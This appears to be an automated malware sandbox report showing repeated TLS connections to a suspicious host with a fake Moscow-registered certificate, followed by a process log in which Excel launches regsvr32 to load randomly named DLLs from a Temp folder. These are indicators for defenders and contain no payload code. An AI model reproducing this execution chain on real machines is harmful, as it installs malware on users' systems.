                                                                                Jan 20, 2021 16:15:02.345410109 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49216 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:04.048556089 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49222 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:05.136898041 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49225 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:06.546210051 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49228 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:08.364630938 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49232 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:10.071746111 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49238 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:11.177829027 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49241 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:12.580827951 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49244 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:13.287823915 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49246 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:14.437695980 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49249 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:16.121128082 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49256 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:16.988439083 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49257 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:17.216505051 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49260 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:18.619196892 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49264 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:20.243889093 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49270 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:20.521085978 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49271 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:22.161134005 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49279 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:23.363163948 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49283 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:24.661545992 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49288 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:26.340131998 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49293 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:26.577426910 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49294 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:26.991142988 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49286 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:28.241166115 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49302 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:29.940860033 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49305 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:30.660327911 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49309 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87

                                                                                Code Manipulations

                                                                                Statistics

                                                                                Behavior

                                                                                System Behavior

                                                                                General

                                                                                Start time:16:12:42
                                                                                Start date:20/01/2021
                                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                Imagebase:0x13f190000
                                                                                File size:27641504 bytes
                                                                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:16:12:50
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
                                                                                Imagebase:0xffbd0000
                                                                                File size:19456 bytes
                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:16:12:52
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
                                                                                Imagebase:0xfff30000
                                                                                File size:19456 bytes
                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:16:12:52
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zdkvrlsh.dll
                                                                                Imagebase:0xfff30000
                                                                                File size:19456 bytes
                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:16:12:52
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline: -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
                                                                                Imagebase:0xfa0000
                                                                                File size:14848 bytes
                                                                                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate

                                                                                General

                                                                                Start time:16:12:52
                                                                                Start date:20/01/2021
                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zaviwlej.dll
                                                                                Imagebase:0xfff30000
                                                                                File size:19456 bytes
                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
Reputation:high

General

Start time:16:12:52
Start date:20/01/2021
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\alajwj.dll
Imagebase:0xfff30000
File size:19456 bytes
MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:16:12:52
Start date:20/01/2021
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Imagebase:0xfff30000
File size:19456 bytes
MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:16:12:58
Start date:20/01/2021
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Imagebase:0xfff30000
File size:19456 bytes
MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:16:13:02
Start date:20/01/2021
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Imagebase:0xfff30000
File size:19456 bytes
MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:16:13:02
Start date:20/01/2021
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline: -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Imagebase:0xfa0000
File size:14848 bytes
MD5 hash:432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:16:13:03
Start date:20/01/2021
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Imagebase:0xfff30000
File size:19456 bytes
MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:16:13:04
Start date:20/01/2021
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline: -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Imagebase:0xfa0000
File size:14848 bytes
MD5 hash:432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:16:13:06
Start date:20/01/2021
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Imagebase:0xfff30000
File size:19456 bytes
MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:16:13:10
Start date:20/01/2021
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline: -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Imagebase:0xfa0000
File size:14848 bytes
MD5 hash:432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:16:14:02
Start date:20/01/2021
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\luwbghnz.dll
Imagebase:0xfff30000
File size:19456 bytes
MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:16:14:02
Start date:20/01/2021
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Imagebase:0xfff30000
File size:19456 bytes
MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:16:14:05
Start date:20/01/2021
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Imagebase:0xfff30000
File size:19456 bytes
MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:16:14:06
Start date:20/01/2021
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline: -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Imagebase:0xfa0000
File size:14848 bytes
MD5 hash:432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:16:14:06
Start date:20/01/2021
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Imagebase:0xfff30000
File size:19456 bytes
MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:16:14:13
Start date:20/01/2021
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline: -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Imagebase:0xfa0000
File size:14848 bytes
MD5 hash:432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Disassembly

Code Analysis